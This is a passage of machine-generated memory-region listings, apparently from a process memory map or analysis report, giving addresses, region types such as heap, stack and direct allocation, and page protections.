page read and write
800000
heap
page read and write
912000
heap
page read and write
32E5000
trusted library allocation
page read and write
7BE000
heap
page read and write
7B5000
heap
page read and write
1DFDEF5C000
heap
page read and write
87A000
heap
page read and write
3743000
heap
page read and write
311E000
stack
page read and write
7BE000
heap
page read and write
342F000
stack
page read and write
4841000
heap
page read and write
4611000
heap
page read and write
28BF000
stack
page read and write
7B5000
heap
page read and write
8B4000
heap
page read and write
33BE000
stack
page read and write
212B53EC000
heap
page read and write
A80000
trusted library allocation
page read and write
5F4AEFE000
stack
page read and write
C1C000
stack
page read and write
1E039000
heap
page read and write
EDE000
stack
page read and write
537000
heap
page read and write
4611000
heap
page read and write
10BE000
unkown
page execute and read and write
18A0000
heap
page read and write
38AE000
stack
page read and write
7BB000
heap
page read and write
4EC1000
heap
page read and write
1E5AB000
stack
page read and write
337E000
stack
page read and write
1C3AE000
stack
page read and write
2B40000
heap
page read and write
830000
heap
page read and write
EE8000
unkown
page execute and read and write
1CBAE000
stack
page read and write
22798E10000
heap
page read and write
34011C000
stack
page read and write
7BB000
heap
page read and write
343E000
stack
page read and write
37AC000
heap
page read and write
E45000
heap
page read and write
B20000
heap
page read and write
54C0000
direct allocation
page execute and read and write
7FFD9B98D000
trusted library allocation
page execute and read and write
4FD000
stack
page read and write
7B5000
heap
page read and write
88E000
heap
page read and write
3B4000
heap
page read and write
876000
heap
page read and write
DD4000
heap
page read and write
7B0000
heap
page read and write
BBC000
heap
page read and write
37BA000
heap
page read and write
392E000
trusted library allocation
page read and write
3778000
heap
page read and write
F3A84FE000
stack
page read and write
6A0000
direct allocation
page read and write
37C9000
heap
page read and write
D18000
heap
page read and write
37A6000
heap
page read and write
44FE000
stack
page read and write
4841000
heap
page read and write
93D000
heap
page read and write
4B0000
heap
page read and write
3757000
heap
page read and write
357E000
stack
page read and write
373E000
stack
page read and write
C20000
unkown
page read and write
840000
trusted library allocation
page read and write
7BB000
heap
page read and write
12D0000
heap
page read and write
37AD000
heap
page read and write
830000
heap
page read and write
52CE000
stack
page read and write
630000
direct allocation
page read and write
802000
heap
page read and write
3745000
heap
page read and write
37C8000
heap
page read and write
876000
heap
page read and write
8CE000
heap
page read and write
C20000
unkown
page read and write
378F000
heap
page read and write
AB1000
heap
page read and write
840000
trusted library allocation
page read and write
8C0000
heap
page read and write
7A5000
heap
page read and write
7A0000
heap
page read and write
37F0000
heap
page read and write
88E000
heap
page read and write
4611000
heap
page read and write
4841000
heap
page read and write
8AE000
heap
page read and write
874000
heap
page read and write
4611000
heap
page read and write
212B53C6000
heap
page read and write
4611000
heap
page read and write
4841000
heap
page read and write
7B5000
heap
page read and write
B50000
heap
page read and write
7CB000
heap
page read and write
87A000
heap
page read and write
37AF000
heap
page read and write
180000
heap
page read and write
37BA000
heap
page read and write
802000
heap
page read and write
4611000
heap
page read and write
401000
unkown
page execute read
10000
unkown
page readonly
8C0000
heap
page read and write
3778000
heap
page read and write
37C4000
heap
page read and write
3767000
heap
page read and write
3778000
heap
page read and write
3AFE000
stack
page read and write
5A0000
heap
page read and write
2FE0000
heap
page read and write
37AC000
heap
page read and write
3743000
heap
page read and write
4830000
direct allocation
page read and write
37F2000
heap
page read and write
15952C80000
heap
page read and write
30FE000
stack
page read and write
8C0000
heap
page read and write
7FFD9BA36000
trusted library allocation
page read and write
3740000
heap
page read and write
2D8F15E9000
heap
page read and write
4841000
heap
page read and write
C82000
heap
page read and write
37B2000
heap
page read and write
49FF000
stack
page read and write
5AE0000
heap
page read and write
4611000
heap
page read and write
1DFDEF7B000
heap
page read and write
6470000
heap
page read and write
390D000
trusted library allocation
page read and write
3767000
heap
page read and write
3765000
heap
page read and write
1CFEE000
stack
page read and write
15952CD0000
heap
page read and write
4630000
heap
page read and write
37E0000
heap
page read and write
7CB000
heap
page read and write
37A6000
heap
page read and write
1DFDEFBD000
heap
page read and write
4841000
heap
page read and write
7A0000
heap
page read and write
830000
heap
page read and write
3ABF000
stack
page read and write
7FFD9B9FC000
trusted library allocation
page execute and read and write
8CE000
heap
page read and write
914000
heap
page read and write
37C8000
heap
page read and write
8B4000
heap
page read and write
4611000
heap
page read and write
3745000
heap
page read and write
15952EA0000
heap
page read and write
436E000
stack
page read and write
D2D000
heap
page read and write
5F4AFFF000
stack
page read and write
3756000
heap
page read and write
7BD000
heap
page read and write
212B53A0000
remote allocation
page read and write
44AE000
stack
page read and write
307E000
stack
page read and write
846000
heap
page read and write
F14000
unkown
page execute and read and write
3797000
heap
page read and write
7FFD9B98D000
trusted library allocation
page execute and read and write
5540000
direct allocation
page execute and read and write
2D8F18DE000
heap
page read and write
37C9000
heap
page read and write
63DF000
stack
page read and write
7A0000
heap
page read and write
B19000
heap
page read and write
375B000
heap
page read and write
37C5000
heap
page read and write
56AD000
stack
page read and write
5C0000
heap
page read and write
802000
heap
page read and write
1FA3FCD0000
heap
page read and write
145E000
stack
page read and write
4611000
heap
page read and write
830000
heap
page read and write
37B7000
heap
page read and write
F1B000
unkown
page execute and read and write
376F000
trusted library allocation
page read and write
899000
heap
page read and write
1F5BE000
stack
page read and write
7FFD9BA0C000
trusted library allocation
page execute and read and write
397F000
stack
page read and write
4600000
direct allocation
page read and write
8CC000
heap
page read and write
4600000
direct allocation
page read and write
487F000
stack
page read and write
F3A86FE000
stack
page read and write
373E000
heap
page read and write
4A50000
direct allocation
page execute and read and write
142E000
stack
page read and write
379B000
heap
page read and write
4841000
heap
page read and write
12C5000
heap
page read and write
7AE000
heap
page read and write
1020000
heap
page read and write
4BEF000
stack
page read and write
63E0000
heap
page read and write
54E0000
direct allocation
page execute and read and write
802000
heap
page read and write
E11000
unkown
page execute and read and write
AC2C0FF000
unkown
page read and write
590000
heap
page read and write
7A1000
heap
page read and write
374C000
heap
page read and write
7FFD9BAC0000
trusted library allocation
page execute and read and write
DE598FB000
stack
page read and write
3797000
heap
page read and write
7CB000
heap
page read and write
3743000
heap
page read and write
C89000
unkown
page read and write
7FFD9B9B2000
trusted library allocation
page read and write
1E5B0000
heap
page read and write
87A000
heap
page read and write
37EE000
heap
page read and write
5510000
direct allocation
page execute and read and write
2E6F000
stack
page read and write
377C000
trusted library allocation
page read and write
373D000
heap
page read and write
93D000
heap
page read and write
54C0000
direct allocation
page execute and read and write
93D000
heap
page read and write
37BA000
heap
page read and write
9E0000
heap
page read and write
37C9000
heap
page read and write
7FFD9BA60000
trusted library allocation
page execute and read and write
1DFDEF63000
heap
page read and write
800000
heap
page read and write
615F000
stack
page read and write
190000
heap
page read and write
1060000
heap
page read and write
93C000
heap
page read and write
830000
heap
page read and write
2FF6000
trusted library allocation
page read and write
321F000
stack
page read and write
35F9000
trusted library allocation
page read and write
9C9000
unkown
page read and write
8C0000
heap
page read and write
36B000
stack
page read and write
4EC1000
heap
page read and write
4AEE000
stack
page read and write
8B4000
heap
page read and write
3797000
heap
page read and write
800000
heap
page read and write
7BE000
heap
page read and write
7BE000
heap
page read and write
31EE000
stack
page read and write
7BB000
heap
page read and write
37CC000
heap
page read and write
830000
heap
page read and write
212B5416000
heap
page read and write
8AE000
heap
page read and write
6B0000
heap
page read and write
F4D000
stack
page read and write
37CC000
heap
page read and write
8B4000
heap
page read and write
4EC1000
heap
page read and write
8CA000
heap
page read and write
37B5000
heap
page read and write
A90000
remote allocation
page read and write
8BC000
heap
page read and write
37B1000
heap
page read and write
7FF4DF6F0000
trusted library allocation
page execute and read and write
C12000
heap
page read and write
7BB000
heap
page read and write
595000
heap
page read and write
802000
heap
page read and write
7B5000
heap
page read and write
3797000
heap
page read and write
27B0000
heap
page read and write
1DCAE000
stack
page read and write
4830000
direct allocation
page read and write
3758000
heap
page read and write
1C6AE000
stack
page read and write
3767000
heap
page read and write
830000
heap
page read and write
99C000
heap
page read and write
37B3000
heap
page read and write
387E000
stack
page read and write
37A3000
heap
page read and write
1220000
heap
page read and write
7FFD9BAA0000
trusted library allocation
page execute and read and write
13227000
trusted library allocation
page read and write
7B5000
heap
page read and write
4D8000
heap
page read and write
3F6F000
stack
page read and write
7FFD9BB10000
trusted library allocation
page read and write
46EF000
stack
page read and write
4841000
heap
page read and write
541E000
stack
page read and write
876000
heap
page read and write
37FE000
stack
page read and write
3767000
heap
page read and write
7B5000
heap
page read and write
800000
heap
page read and write
3762000
heap
page read and write
37AC000
heap
page read and write
3765000
heap
page read and write
4841000
heap
page read and write
A90000
remote allocation
page read and write
3425000
trusted library allocation
page read and write
912000
heap
page read and write
9C2000
unkown
page execute and read and write
800000
heap
page read and write
14A0000
direct allocation
page read and write
3758000
heap
page read and write
24911442000
heap
page read and write
473F000
stack
page read and write
36FF000
stack
page read and write
88E000
heap
page read and write
802000
heap
page read and write
1DD5C000
stack
page read and write
802000
heap
page read and write
14A0000
direct allocation
page read and write
7B5000
heap
page read and write
1DFDF0B0000
heap
page read and write
3798000
heap
page read and write
37B1000
heap
page read and write
3C9F000
stack
page read and write
49BF000
stack
page read and write
40AF000
stack
page read and write
830000
heap
page read and write
8B4000
heap
page read and write
32FE000
stack
page read and write
379E000
heap
page read and write
249113D0000
heap
page read and write
34BE000
stack
page read and write
777000
heap
page read and write
401000
unkown
page execute read
C63000
heap
page read and write
3317000
trusted library allocation
page read and write
1C6EE000
stack
page read and write
16DE000
stack
page read and write
C89000
unkown
page write copy
2D8F15E0000
heap
page read and write
37B6000
heap
page read and write
7B5000
heap
page read and write
378E000
heap
page read and write
8AE000
heap
page read and write
3742000
heap
page read and write
37B3000
heap
page read and write
7CB000
heap
page read and write
7FFD9BAD0000
trusted library allocation
page execute and read and write
4611000
heap
page read and write
7FFD9BB20000
trusted library allocation
page read and write
7BE000
heap
page read and write
7BB000
heap
page read and write
EA474FF000
stack
page read and write
133C3000
trusted library allocation
page read and write
7AE000
heap
page read and write
802000
heap
page read and write
375A000
heap
page read and write
DF8000
heap
page read and write
3794000
heap
page read and write
7F4000
stack
page read and write
4611000
heap
page read and write
88B000
heap
page read and write
7FFD9B9B4000
trusted library allocation
page read and write
800000
heap
page read and write
8B4000
heap
page read and write
3789000
heap
page read and write
7BB000
heap
page read and write
3767000
heap
page read and write
7CB000
heap
page read and write
11F6000
stack
page read and write
3774000
heap
page read and write
37AE000
heap
page read and write
4D31000
direct allocation
page read and write
6A10000
heap
page read and write
373E000
heap
page read and write
356E000
stack
page read and write
3509000
trusted library allocation
page read and write
400000
unkown
page readonly
1DFDEF20000
remote allocation
page read and write
1DFDEEE0000
heap
page read and write
2D6E2970000
heap
page read and write
374C000
heap
page read and write
37C0000
heap
page read and write
838C000
stack
page read and write
37C9000
heap
page read and write
4841000
heap
page read and write
876000
heap
page read and write
802000
heap
page read and write
3756000
heap
page read and write
3779000
heap
page read and write
960000
unkown
page readonly
C89000
unkown
page write copy
3A4F000
stack
page read and write
4841000
heap
page read and write
28AE000
stack
page read and write
914000
heap
page read and write
212B5400000
heap
page read and write
26CC26FA000
heap
page read and write
379F000
heap
page read and write
376A000
heap
page read and write
373E000
heap
page read and write
4600000
direct allocation
page read and write
37B7000
heap
page read and write
7FFD9BA66000
trusted library allocation
page execute and read and write
437F000
stack
page read and write
373A000
heap
page read and write
373E000
heap
page read and write
1200000
heap
page read and write
4E60000
direct allocation
page execute and read and write
212B5402000
heap
page read and write
876000
heap
page read and write
3773000
heap
page read and write
7FFD9B9A4000
trusted library allocation
page read and write
178E000
stack
page read and write
4611000
heap
page read and write
EE8000
unkown
page execute and read and write
212B53A0000
remote allocation
page read and write
54C0000
direct allocation
page execute and read and write
2AEE000
stack
page read and write
37B8000
heap
page read and write
13448000
trusted library allocation
page read and write
914000
heap
page read and write
37A3000
heap
page read and write
4611000
heap
page read and write
37B7000
heap
page read and write
800000
heap
page read and write
1CF9E000
stack
page read and write
3797000
heap
page read and write
4A10000
direct allocation
page execute and read and write
4611000
heap
page read and write
379F000
heap
page read and write
4622000
heap
page read and write
912000
heap
page read and write
4611000
heap
page read and write
37B3000
heap
page read and write
C10000
direct allocation
page execute and read and write
778000
heap
page read and write
2D6E2A4F000
heap
page read and write
1DFA0000
heap
page read and write
87A000
heap
page read and write
830000
heap
page read and write
590C000
stack
page read and write
3788000
heap
page read and write
960000
heap
page read and write
3700000
heap
page read and write
720000
remote allocation
page read and write
330C000
trusted library allocation
page read and write
37AC000
heap
page read and write
9D0000
heap
page read and write
28DD000
stack
page read and write
1290000
heap
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
377D000
heap
page read and write
802000
heap
page read and write
432F000
stack
page read and write
580D000
stack
page read and write
4E60000
direct allocation
page execute and read and write
373E000
heap
page read and write
4611000
heap
page read and write
802000
heap
page read and write
4841000
heap
page read and write
4611000
heap
page read and write
4611000
heap
page read and write
7E2000
heap
page read and write
3797000
heap
page read and write
4611000
heap
page read and write
7FFD9BA5C000
trusted library allocation
page execute and read and write
8BB000
heap
page read and write
800000
heap
page read and write
3765000
heap
page read and write
8C0000
heap
page read and write
88E000
heap
page read and write
50A000
heap
page read and write
378B000
heap
page read and write
3780000
heap
page read and write
787000
heap
page read and write
37C8000
heap
page read and write
7B5000
heap
page read and write
406000
unkown
page readonly
41BF000
stack
page read and write
37C7000
heap
page read and write
4841000
heap
page read and write
7B5000
heap
page read and write
1BDF0000
heap
page read and write
5D0000
heap
page read and write
E70000
heap
page read and write
802000
heap
page read and write
1DFCA000
heap
page read and write
379B000
heap
page read and write
8C0000
heap
page read and write
800000
heap
page read and write
8BB000
heap
page read and write
905000
heap
page read and write
7CB000
heap
page read and write
EA4747F000
stack
page read and write
50D000
heap
page read and write
37CC000
heap
page read and write
3777000
heap
page read and write
37B0000
heap
page read and write
93D000
heap
page read and write
341D000
stack
page read and write
802000
heap
page read and write
106A000
heap
page read and write
1BD3D000
stack
page read and write
54F0000
direct allocation
page execute and read and write
8C0000
heap
page read and write
4841000
heap
page read and write
37E0000
heap
page read and write
912000
heap
page read and write
39BE000
stack
page read and write
7FFD9BA30000
trusted library allocation
page execute and read and write
87A000
heap
page read and write
830000
heap
page read and write
9C9000
unkown
page write copy
4EC1000
heap
page read and write
7CB000
heap
page read and write
1DB9E000
stack
page read and write
37B9000
heap
page read and write
4611000
heap
page read and write
8CB000
heap
page read and write
7BE000
heap
page read and write
899000
heap
page read and write
37AE000
heap
page read and write
87A000
heap
page read and write
7FFD9B9DD000
trusted library allocation
page execute and read and write
15952CF3000
heap
page read and write
C6A000
unkown
page execute and read and write
37BA000
heap
page read and write
3B4000
heap
page read and write
36F0000
heap
page read and write
8BC000
heap
page read and write
37B0000
heap
page read and write
598000
heap
page read and write
37C8000
heap
page read and write
414000
unkown
page readonly
3411000
trusted library allocation
page read and write
876000
heap
page read and write
373E000
heap
page read and write
14A0000
direct allocation
page read and write
37C4000
heap
page read and write
1E4AB000
stack
page read and write
830000
heap
page read and write
7CB000
heap
page read and write
7BE000
heap
page read and write
38FA000
trusted library allocation
page read and write
463E000
stack
page read and write
3B4000
heap
page read and write
3739000
heap
page read and write
374A000
heap
page read and write
7FFD9BB30000
trusted library allocation
page execute and read and write
7FFD9BA56000
trusted library allocation
page execute and read and write
7FFD9BA60000
trusted library allocation
page execute and read and write
8B4000
heap
page read and write
22798FF0000
heap
page read and write
8AE000
heap
page read and write
830000
heap
page read and write
44FE000
stack
page read and write
4841000
heap
page read and write
4C20000
direct allocation
page execute and read and write
333F000
stack
page read and write
800000
heap
page read and write
37B3000
heap
page read and write
37E0000
heap
page read and write
37AC000
heap
page read and write
899000
heap
page read and write
630000
direct allocation
page read and write
4DB4000
heap
page read and write
379E000
heap
page read and write
7B5000
heap
page read and write
4841000
heap
page read and write
4841000
heap
page read and write
4600000
direct allocation
page read and write
1240000
heap
page read and write
3B4000
heap
page read and write
7FFD9B990000
trusted library allocation
page read and write
802000
heap
page read and write
158B000
heap
page read and write
802000
heap
page read and write
335E000
trusted library allocation
page read and write
4611000
heap
page read and write
4611000
heap
page read and write
802000
heap
page read and write
876000
heap
page read and write
379F000
heap
page read and write
1E49C000
stack
page read and write
14A0000
direct allocation
page read and write
37C4000
heap
page read and write
37B8000
heap
page read and write
F2B000
unkown
page execute and write copy
3783000
heap
page read and write
379E000
heap
page read and write
3F0000
heap
page read and write
87A000
heap
page read and write
8AE000
heap
page read and write
7BB000
heap
page read and write
914000
heap
page read and write
3765000
heap
page read and write
373C000
heap
page read and write
7FFD9BAA0000
trusted library allocation
page execute and read and write
7BB000
heap
page read and write
4E70000
direct allocation
page execute and read and write
40BE000
stack
page read and write
4611000
heap
page read and write
B85000
heap
page read and write
7FFD9BB30000
trusted library allocation
page execute and read and write
1C58E000
stack
page read and write
802000
heap
page read and write
3740000
heap
page read and write
4611000
heap
page read and write
37C4000
heap
page read and write
37C4000
heap
page read and write
830000
heap
page read and write
C89000
unkown
page write copy
8CE000
heap
page read and write
378A000
trusted library allocation
page read and write
7B0000
heap
page read and write
378B000
heap
page read and write
1DFDEFA4000
heap
page read and write
899000
heap
page read and write
802000
heap
page read and write
212B5370000
heap
page read and write
375B000
heap
page read and write
2FB0000
heap
page read and write
1DFF0000
heap
page read and write
7CB000
heap
page read and write
4F8000
heap
page read and write
8AE000
heap
page read and write
4A30000
direct allocation
page execute and read and write
4440000
heap
page read and write
1D7EE000
stack
page read and write
802000
heap
page read and write
4611000
heap
page read and write
3743000
heap
page read and write
4A20000
direct allocation
page execute and read and write
37B9000
heap
page read and write
3FFE000
stack
page read and write
35FE000
stack
page read and write
1D47E000
stack
page read and write
4611000
heap
page read and write
379B000
heap
page read and write
B10000
heap
page read and write
4EC1000
heap
page read and write
87A000
heap
page read and write
92E000
stack
page read and write
4441000
heap
page read and write
1BA1D000
stack
page read and write
37B0000
heap
page read and write
7BE000
heap
page read and write
37B0000
heap
page read and write
3E7F000
stack
page read and write
830000
heap
page read and write
802000
heap
page read and write
F0E000
stack
page read and write
4611000
heap
page read and write
1CE8E000
stack
page read and write
760000
heap
page read and write
7EDE000
stack
page read and write
7FFD9B9C2000
trusted library allocation
page read and write
1D07E000
stack
page read and write
30DE000
stack
page read and write
830000
heap
page read and write
180000
heap
page read and write
7BE000
heap
page read and write
4600000
direct allocation
page read and write
37CC000
heap
page read and write
5F4ABDC000
stack
page read and write
800000
heap
page read and write
379B000
heap
page read and write
830000
heap
page read and write
912000
heap
page read and write
7CB000
heap
page read and write
379E000
heap
page read and write
3436000
trusted library allocation
page read and write
3B4000
heap
page read and write
383F000
stack
page read and write
4E60000
direct allocation
page execute and read and write
407F000
stack
page read and write
7E2000
heap
page read and write
4830000
direct allocation
page read and write
7FFD9B973000
trusted library allocation
page execute and read and write
4F00000
direct allocation
page execute and read and write
37AC000
heap
page read and write
4841000
heap
page read and write
7B0000
heap
page read and write
212B53D0000
heap
page read and write
B50000
heap
page read and write
3E9C000
stack
page read and write
830000
heap
page read and write
375A000
heap
page read and write
8CF000
heap
page read and write
8B4000
heap
page read and write
3757000
heap
page read and write
8CA000
heap
page read and write
3000000
heap
page read and write
7BE000
heap
page read and write
D70000
heap
page read and write
7B5000
heap
page read and write
37AC000
heap
page read and write
10C0000
unkown
page execute and read and write
3773000
heap
page read and write
3767000
heap
page read and write
4841000
heap
page read and write
37BA000
heap
page read and write
4600000
direct allocation
page read and write
800000
heap
page read and write
3BAF000
stack
page read and write
2DBF000
stack
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
830000
heap
page read and write
8B4000
heap
page read and write
377E000
heap
page read and write
7A0000
heap
page read and write
7FFD9B9BD000
trusted library allocation
page execute and read and write
899000
heap
page read and write
4611000
heap
page read and write
3787000
heap
page read and write
87A000
heap
page read and write
7FFD9B9BD000
trusted library allocation
page execute and read and write
830000
heap
page read and write
7FFD9B9DC000
trusted library allocation
page execute and read and write
7BE000
heap
page read and write
4611000
heap
page read and write
35BE000
stack
page read and write
F3A7FFE000
stack
page read and write
4611000
heap
page read and write
830000
heap
page read and write
37A3000
heap
page read and write
8BB000
heap
page read and write
7FFD9B9AD000
trusted library allocation
page execute and read and write
413E000
stack
page read and write
4CD0000
direct allocation
page execute and read and write
802000
heap
page read and write
4441000
heap
page read and write
37B3000
heap
page read and write
802000
heap
page read and write
800000
heap
page read and write
2C6F000
stack
page read and write
7FFD9B9A3000
trusted library allocation
page execute and read and write
630000
direct allocation
page read and write
1DF9B000
stack
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
37B1000
heap
page read and write
802000
heap
page read and write
7B5000
heap
page read and write
40F000
unkown
page write copy
800000
heap
page read and write
605E000
stack
page read and write
36BE000
stack
page read and write
914000
heap
page read and write
2B6D000
heap
page read and write
37B0000
heap
page read and write
37AC000
heap
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
7B0000
heap
page read and write
37C4000
heap
page read and write
830000
heap
page read and write
7BB000
heap
page read and write
391B000
trusted library allocation
page read and write
C82000
unkown
page execute and read and write
961000
unkown
page execute and write copy
DC5A6FF000
stack
page read and write
37C4000
heap
page read and write
377F000
heap
page read and write
C80000
heap
page read and write
17E0000
heap
page execute and read and write
93D000
heap
page read and write
782000
heap
page read and write
88B000
heap
page read and write
12FC000
heap
page read and write
26CC2739000
heap
page read and write
8B4000
heap
page read and write
12FA7000
trusted library allocation
page read and write
D95000
heap
page read and write
4A80000
direct allocation
page execute and read and write
3744000
heap
page read and write
3B4000
heap
page read and write
37AC000
heap
page read and write
379F000
heap
page read and write
3190000
heap
page read and write
BCA000
heap
page read and write
1DFDEF40000
heap
page read and write
4C7E000
stack
page read and write
7FFD9B992000
trusted library allocation
page read and write
3AFE000
stack
page read and write
1DFDEF61000
heap
page read and write
37B5000
heap
page read and write
401000
unkown
page execute read
8B4000
heap
page read and write
37B2000
heap
page read and write
1D9AE000
stack
page read and write
4611000
heap
page read and write
800000
heap
page read and write
39BE000
stack
page read and write
1DFDEF56000
heap
page read and write
54C0000
direct allocation
page execute and read and write
7BE000
heap
page read and write
4611000
heap
page read and write
2D8F18D5000
heap
page read and write
37B8000
heap
page read and write
802000
heap
page read and write
7FFD9BA86000
trusted library allocation
page execute and read and write
379F000
heap
page read and write
A02000
heap
page read and write
8BC000
heap
page read and write
1300000
heap
page read and write
7CB000
heap
page read and write
4611000
heap
page read and write
7A5000
heap
page read and write
84C000
heap
page read and write
8C0000
heap
page read and write
778000
heap
page read and write
3764000
heap
page read and write
37F0000
heap
page read and write
37B3000
heap
page read and write
4611000
heap
page read and write
7FFD9B98D000
trusted library allocation
page execute and read and write
329E000
stack
page read and write
830000
heap
page read and write
802000
heap
page read and write
E4C000
heap
page read and write
37A1000
heap
page read and write
4841000
heap
page read and write
3765000
heap
page read and write
914000
heap
page read and write
3419000
trusted library allocation
page read and write
A0A000
heap
page read and write
3B4000
heap
page read and write
7A0000
heap
page read and write
1BF90000
heap
page execute and read and write
3FBF000
stack
page read and write
820000
trusted library allocation
page read and write
876000
heap
page read and write
7FFD9B9CD000
trusted library allocation
page execute and read and write
10C1000
unkown
page execute and write copy
802000
heap
page read and write
840000
heap
page read and write
57AE000
stack
page read and write
830000
heap
page read and write
914000
heap
page read and write
36AF000
stack
page read and write
4830000
direct allocation
page read and write
1C66F000
stack
page read and write
7FFD9BAC0000
trusted library allocation
page execute and read and write
38F5000
trusted library allocation
page read and write
41EF000
stack
page read and write
3D7E000
stack
page read and write
C20000
unkown
page readonly
367F000
stack
page read and write
D57000
heap
page read and write
37F4000
heap
page read and write
4841000
heap
page read and write
37AF000
heap
page read and write
374B000
heap
page read and write
7FFD9BA20000
trusted library allocation
page read and write
37C6000
heap
page read and write
8AE000
heap
page read and write
7CB000
heap
page read and write
4841000
heap
page read and write
37BA000
heap
page read and write
3369000
trusted library allocation
page read and write
DC5A67F000
stack
page read and write
37B1000
heap
page read and write
3786000
heap
page read and write
830000
heap
page read and write
7FFD9BA0C000
trusted library allocation
page execute and read and write
936000
heap
page read and write
1E28B000
stack
page read and write
830000
heap
page read and write
1DFDEE00000
heap
page read and write
914000
heap
page read and write
7FFD9B9B2000
trusted library allocation
page read and write
16EF000
stack
page read and write
CEC000
heap
page read and write
4830000
direct allocation
page read and write
4611000
heap
page read and write
3B4000
heap
page read and write
8C0000
heap
page read and write
630000
direct allocation
page read and write
3757000
heap
page read and write
7A0000
heap
page read and write
8CF000
heap
page read and write
375A000
heap
page read and write
4EA0000
direct allocation
page execute and read and write
358D000
trusted library allocation
page read and write
2B6B000
heap
page read and write
7CB000
heap
page read and write
3BEE000
stack
page read and write
7BB000
heap
page read and write
8CD000
heap
page read and write
379F000
heap
page read and write
8AE000
heap
page read and write
3789000
heap
page read and write
33FF000
stack
page read and write
7A1000
heap
page read and write
4A00000
direct allocation
page execute and read and write
4EBF000
stack
page read and write
A70000
heap
page read and write
E1C000
heap
page read and write
1DFDEF94000
heap
page read and write
37A3000
heap
page read and write
7FFD9BA50000
trusted library allocation
page read and write
4441000
heap
page read and write
800000
heap
page read and write
332E000
stack
page read and write
B91000
heap
page read and write
C62A3FE000
stack
page read and write
7BE000
heap
page read and write
7BE000
heap
page read and write
3750000
heap
page read and write
640000
heap
page read and write
40FF000
stack
page read and write
778000
heap
page read and write
377D000
heap
page read and write
8AE000
heap
page read and write
212B53C9000
heap
page read and write
7FFD9B9DC000
trusted library allocation
page execute and read and write
802000
heap
page read and write
630000
direct allocation
page read and write
37CD000
heap
page read and write
1245000
heap
page read and write
8C0000
heap
page read and write
8AE000
heap
page read and write
876000
heap
page read and write
7B5000
heap
page read and write
37B8000
heap
page read and write
E18000
heap
page read and write
12FA3000
trusted library allocation
page read and write
7A6000
heap
page read and write
477E000
stack
page read and write
7A0000
heap
page read and write
3742000
heap
page read and write
7FFD9BA70000
trusted library allocation
page execute and read and write
1DFDEF8D000
heap
page read and write
37AC000
heap
page read and write
830000
heap
page read and write
3796000
heap
page read and write
7FFD9B9AB000
trusted library allocation
page execute and read and write
7CB000
heap
page read and write
8CA000
heap
page read and write
1DFDEF7C000
heap
page read and write
37CD000
heap
page read and write
4611000
heap
page read and write
912000
heap
page read and write
4E60000
direct allocation
page execute and read and write
899000
heap
page read and write
876000
heap
page read and write
3758000
heap
page read and write
3BFF000
stack
page read and write
1C7AF000
stack
page read and write
800000
heap
page read and write
37D4000
heap
page read and write
7FFD9B9C2000
trusted library allocation
page read and write
3C3D000
stack
page read and write
802000
heap
page read and write
778000
heap
page read and write
7A0000
heap
page read and write
B80000
trusted library allocation
page read and write
1F09E000
stack
page read and write
4CBC000
stack
page read and write
9F4000
stack
page read and write
830000
heap
page read and write
CE0000
heap
page execute and read and write
2E000
unkown
page readonly
899000
heap
page read and write
37B8000
heap
page read and write
4AA0000
direct allocation
page read and write
37AC000
heap
page read and write
7FFD9BA96000
trusted library allocation
page execute and read and write
1EC9F000
stack
page read and write
8CA000
heap
page read and write
7BB000
heap
page read and write
37F6000
heap
page read and write
37BA000
heap
page read and write
249115F0000
heap
page read and write
914000
heap
page read and write
800000
heap
page read and write
4C50000
direct allocation
page execute and read and write
1C95D000
stack
page read and write
7A0000
heap
page read and write
8C9000
heap
page read and write
3767000
heap
page read and write
37B2000
heap
page read and write
37CC000
heap
page read and write
802000
heap
page read and write
379E000
heap
page read and write
2D8F18D0000
heap
page read and write
3782000
heap
page read and write
A11000
heap
page read and write
7FFD9B9A3000
trusted library allocation
page execute and read and write
899000
heap
page read and write
730000
heap
page read and write
1EDBD000
stack
page read and write
1E89D000
stack
page read and write
3797000
heap
page read and write
37B5000
heap
page read and write
3740000
heap
page read and write
800000
heap
page read and write
899000
heap
page read and write
4E1F000
stack
page read and write
3A3F000
stack
page read and write
7FFD9B974000
trusted library allocation
page read and write
3736000
trusted library allocation
page read and write
37CA000
heap
page read and write
7BB000
heap
page read and write
4E60000
direct allocation
page execute and read and write
87A000
heap
page read and write
3786000
heap
page read and write
36EE000
stack
page read and write
7FFD9B990000
trusted library allocation
page read and write
3743000
heap
page read and write
7D2000
heap
page read and write
7BE000
heap
page read and write
3B4000
heap
page read and write
3B7F000
stack
page read and write
914000
heap
page read and write
802000
heap
page read and write
3C3E000
stack
page read and write
10C1000
unkown
page execute and write copy
802000
heap
page read and write
3742000
heap
page read and write
2491147B000
heap
page read and write
22799090000
heap
page read and write
4611000
heap
page read and write
2CBE000
stack
page read and write
3790000
heap
page read and write
306F000
stack
page read and write
870000
heap
page read and write
1DFDEF00000
heap
page read and write
830000
heap
page read and write
7BE000
heap
page read and write
800000
heap
page read and write
104F000
stack
page read and write
13229000
trusted library allocation
page read and write
7FFD9B9FC000
trusted library allocation
page execute and read and write
7FFD9BA2C000
trusted library allocation
page execute and read and write
373E000
heap
page read and write
37B3000
heap
page read and write
A22000
heap
page read and write
3BFF000
stack
page read and write
1301000
heap
page read and write
4C90000
direct allocation
page execute and read and write
7BB000
heap
page read and write
6A00000
heap
page read and write
37BA000
heap
page read and write
7CB000
heap
page read and write
4A0000
heap
page read and write
3B4000
heap
page read and write
1BB5D000
stack
page read and write
28F7000
heap
page read and write
4611000
heap
page read and write
383F000
stack
page read and write
2B60000
heap
page read and write
4611000
heap
page read and write
800000
heap
page read and write
93D000
heap
page read and write
777000
heap
page read and write
37F4000
heap
page read and write
212B53FD000
heap
page read and write
802000
heap
page read and write
375A000
heap
page read and write
317F000
stack
page read and write
373B000
heap
page read and write
CE0000
heap
page read and write
4841000
heap
page read and write
3746000
heap
page read and write
CE5000
heap
page read and write
1C34E000
stack
page read and write
7FFD9BB20000
trusted library allocation
page read and write
802000
heap
page read and write
1E03B000
heap
page read and write
37B3000
heap
page read and write
3B4000
heap
page read and write
800000
heap
page read and write
2D6F000
stack
page read and write
14A0000
direct allocation
page read and write
37AC000
heap
page read and write
26CC2630000
heap
page read and write
7BB000
heap
page read and write
7FFD9BA86000
trusted library allocation
page execute and read and write
379E000
heap
page read and write
E00000
unkown
page execute and read and write
7BE000
heap
page read and write
830000
heap
page read and write
54B0000
direct allocation
